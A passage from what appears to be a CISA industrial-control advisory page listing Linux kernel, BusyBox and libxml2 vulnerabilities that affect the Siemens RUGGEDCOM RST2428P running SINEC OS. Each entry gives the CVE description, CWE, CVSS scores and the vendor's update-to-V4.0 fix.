<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40264</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: be2net: pass wrb_params in case of OS2BMC be_insert_vlan_in_pkt() is called with the wrb_params argument being NULL at be_send_pkt_to_bmc() call site.  This may lead to dereferencing a NULL pointer when processing a workaround for specific packet, as commit bc0c3405abbb ("be2net: fix a Tx stall bug caused by a specific ipv6 packet") states. The correct way would be to pass the wrb_params from be_xmit().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40264">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40271</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fs/proc: fix uaf in proc_readdir_de() Pde is erased from subdir rbtree through rb_erase(), but not set the node to EMPTY, which may result in uaf access. We should use RB_CLEAR_NODE() set the erased node to EMPTY, then pde_subdir_next() will return NULL to avoid uaf access. We found an uaf issue while using stress-ng testing, need to run testcase getdent and tun in the same time. The steps of the issue is as follows: 1) use getdent to traverse dir /proc/pid/net/dev_snmp6/, and current pde is tun3; 2) in the [time windows] unregister netdevice tun3 and tun2, and erase them from rbtree. erase tun3 first, and then erase tun2. the pde(tun2) will be released to slab; 3) continue to getdent process, then pde_subdir_next() will return pde(tun2) which is released, it will case uaf access. CPU 0 | CPU 1 ------------------------------------------------------------------------- traverse dir /proc/pid/net/dev_snmp6/ | unregister_netdevice(tun-&gt;dev) //tun3 tun2 sys_getdents64() | iterate_dir() | proc_readdir() | proc_readdir_de() | snmp6_unregister_dev() pde_get(de); | proc_remove() read_unlock(&amp;proc_subdir_lock); | remove_proc_subtree() | write_lock(&amp;proc_subdir_lock); [time window] | rb_erase(&amp;root-&gt;subdir_node, &amp;parent-&gt;subdir); | write_unlock(&amp;proc_subdir_lock); read_lock(&amp;proc_subdir_lock); | next = pde_subdir_next(de); | pde_put(de); | de = next; //UAF | rbtree of dev_snmp6 | pde(tun3) / \ NULL pde(tun2)</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40271">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/625.html">CWE-625 Permissive Regular Expression</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40278</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak Fix a KMSAN kernel-infoleak detected by the syzbot . [net?] KMSAN: kernel-infoleak in __skb_datagram_iter In tcf_ife_dump(), the variable 'opt' was partially initialized using a designatied initializer. While the padding bytes are reamined uninitialized. nla_put() copies the entire structure into a netlink message, these uninitialized bytes leaked to userspace. Initialize the structure with memset before assigning its fields to ensure all members and padding are cleared prior to beign copied. This change silences the KMSAN report and prevents potential information leaks from the kernel memory. This fix has been tested and validated by syzbot. This patch closes the bug reported at the following syzkaller link and ensures no infoleak.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40278">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40280</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: tipc: Fix use-after-free in tipc_mon_reinit_self(). syzbot reported use-after-free of tipc_net(net)-&gt;monitors[] in tipc_mon_reinit_self(). [0] The array is protected by RTNL, but tipc_mon_reinit_self() iterates over it without RTNL. tipc_mon_reinit_self() is called from tipc_net_finalize(), which is always under RTNL except for tipc_net_finalize_work(). Let's hold RTNL in tipc_net_finalize_work(). [0]: BUG: KASAN: slab-use-after-free in __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] BUG: KASAN: slab-use-after-free in _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162 Read of size 1 at addr ffff88805eae1030 by task kworker/0:7/5989 CPU: 0 UID: 0 PID: 5989 Comm: kworker/0:7 Not tainted syzkaller #0 PREEMPT_{RT,(full)} Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025 Workqueue: events tipc_net_finalize_work Call Trace: dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xca/0x240 mm/kasan/report.c:482 kasan_report+0x118/0x150 mm/kasan/report.c:595 __kasan_check_byte+0x2a/0x40 mm/kasan/common.c:568 kasan_check_byte include/linux/kasan.h:399 [inline] lock_acquire+0x8d/0x360 kernel/locking/lockdep.c:5842 __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162 rtlock_slowlock kernel/locking/rtmutex.c:1894 [inline] rwbase_rtmutex_lock_state kernel/locking/spinlock_rt.c:160 [inline] rwbase_write_lock+0xd3/0x7e0 kernel/locking/rwbase_rt.c:244 rt_write_lock+0x76/0x110 kernel/locking/spinlock_rt.c:243 write_lock_bh include/linux/rwlock_rt.h:99 [inline] tipc_mon_reinit_self+0x79/0x430 net/tipc/monitor.c:718 tipc_net_finalize+0x115/0x190 net/tipc/net.c:140 process_one_work kernel/workqueue.c:3236 [inline] process_scheduled_works+0xade/0x17b0 kernel/workqueue.c:3319 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3400 kthread+0x70e/0x8a0 kernel/kthread.c:463 ret_from_fork+0x439/0x7d0 arch/x86/kernel/process.c:148 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 Allocated by task 6089: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:388 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:405 kasan_kmalloc include/linux/kasan.h:260 [inline] __kmalloc_cache_noprof+0x1a8/0x320 mm/slub.c:4407 kmalloc_noprof include/linux/slab.h:905 [inline] kzalloc_noprof include/linux/slab.h:1039 [inline] tipc_mon_create+0xc3/0x4d0 net/tipc/monitor.c:657 tipc_enable_bearer net/tipc/bearer.c:357 [inline] __tipc_nl_bearer_enable+0xe16/0x13f0 net/tipc/bearer.c:1047 __tipc_nl_compat_doit net/tipc/netlink_compat.c:371 [inline] tipc_nl_compat_doit+0x3bc/0x5f0 net/tipc/netlink_compat.c:393 tipc_nl_compat_handle net/tipc/netlink_compat.c:-1 [inline] tipc_nl_compat_recv+0x83c/0xbe0 net/tipc/netlink_compat.c:1321 genl_family_rcv_msg_doit+0x215/0x300 net/netlink/genetlink.c:1115 genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0x60e/0x790 net/netlink/genetlink.c:1210 netlink_rcv_skb+0x208/0x470 net/netlink/af_netlink.c:2552 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline] netlink_unicast+0x846/0xa10 net/netlink/af_netlink.c:1346 netlink_sendmsg+0x805/0xb30 net/netlink/af_netlink.c:1896 sock_sendmsg_nosec net/socket.c:714 [inline] __sock_sendmsg+0x21c/0x270 net/socket.c:729 ____sys_sendmsg+0x508/0x820 net/socket.c:2614 ___sys_sendmsg+0x21f/0x2a0 net/socket.c:2668 __sys_sendmsg net/socket.c:2700 [inline] __do_sys_sendmsg net/socket.c:2705 [inline] __se_sys_sendmsg net/socket.c:2703 [inline] __x64_sys_sendmsg+0x1a1/0x260 net/socket.c:2703 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0x3b0 arch/ ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40280">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40281</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: sctp: prevent possible shift-out-of-bounds in sctp_transport_update_rto syzbot reported a possible shift-out-of-bounds [1] Blamed commit added rto_alpha_max and rto_beta_max set to 1000. It is unclear if some sctp users are setting very large rto_alpha and/or rto_beta. In order to prevent user regression, perform the test at run time. Also add READ_ONCE() annotations as sysctl values can change under us. [1] UBSAN: shift-out-of-bounds in net/sctp/transport.c:509:41 shift exponent 64 is too large for 32-bit type 'unsigned int' CPU: 0 UID: 0 PID: 16704 Comm: syz.2.2320 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025 Call Trace: __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x16c/0x1f0 lib/dump_stack.c:120 ubsan_epilogue lib/ubsan.c:233 [inline] __ubsan_handle_shift_out_of_bounds+0x27f/0x420 lib/ubsan.c:494 sctp_transport_update_rto.cold+0x1c/0x34b net/sctp/transport.c:509 sctp_check_transmitted+0x11c4/0x1c30 net/sctp/outqueue.c:1502 sctp_outq_sack+0x4ef/0x1b20 net/sctp/outqueue.c:1338 sctp_cmd_process_sack net/sctp/sm_sideeffect.c:840 [inline] sctp_cmd_interpreter net/sctp/sm_sideeffect.c:1372 [inline]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40281">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1335.html">CWE-1335 Incorrect Bitwise Shift of Integer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40345</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: usb: storage: sddr55: Reject out-of-bound new_pba Discovered by Atuin - Automated Vulnerability Discovery Engine. new_pba comes from the status packet returned after each write. A bogus device could report values beyond the block count derived from info-&gt;capacity, letting the driver walk off the end of pba_to_lba[] and corrupt heap memory. Reject PBAs that exceed the computed block count and fail the transfer so we avoid touching out-of-range mapping entries.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40345">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.8</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-46394</a></h3>
<div class="csaf-accordion-content">
<p>In tar in BusyBox through 1.37.0, a TAR archive can have filenames hidden from a listing through the use of terminal escape sequences.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-46394">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/451.html">CWE-451 User Interface (UI) Misrepresentation of Critical Information</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.2</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-49794</a></h3>
<div class="csaf-accordion-content">
<p>A use-after-free vulnerability was found in libxml2. This issue occurs when parsing XPath elements under certain circumstances when the XML schematron has the schema elements. This flaw allows a malicious actor to craft a malicious XML document used as input for libxml, resulting in the program's crash using libxml or other possible undefined behaviors.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-49794">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.1</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-49795</a></h3>
<div class="csaf-accordion-content">
<p>A NULL pointer dereference vulnerability was found in libxml2 when processing XPath XML expressions. This flaw allows an attacker to craft a malicious XML input to libxml2, leading to a denial of service.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-49795">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-49796</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability was found in libxml2. Processing certain sch:name elements from the input XML file can trigger a memory corruption issue. This flaw allows an attacker to craft a malicious XML input file that can lead libxml to crash, resulting in a denial of service or other possible undefined behavior due to sensitive data being corrupted in memory.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-49796">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.1</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-60876</a></h3>
<div class="csaf-accordion-content">
<p>BusyBox wget thru 1.3.7 accepted raw CR (0x0D)/LF (0x0A) and other C0 control bytes in the HTTP request-target (path/query), allowing the request line to be split and attacker-controlled headers to be injected. To preserve the HTTP/1.1 request-line shape METHOD SP request-target SP HTTP/1.1, a raw space (0x20) in the request-target must also be rejected (clients should use %20).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-60876">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/284.html">CWE-284 Improper Access Control</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
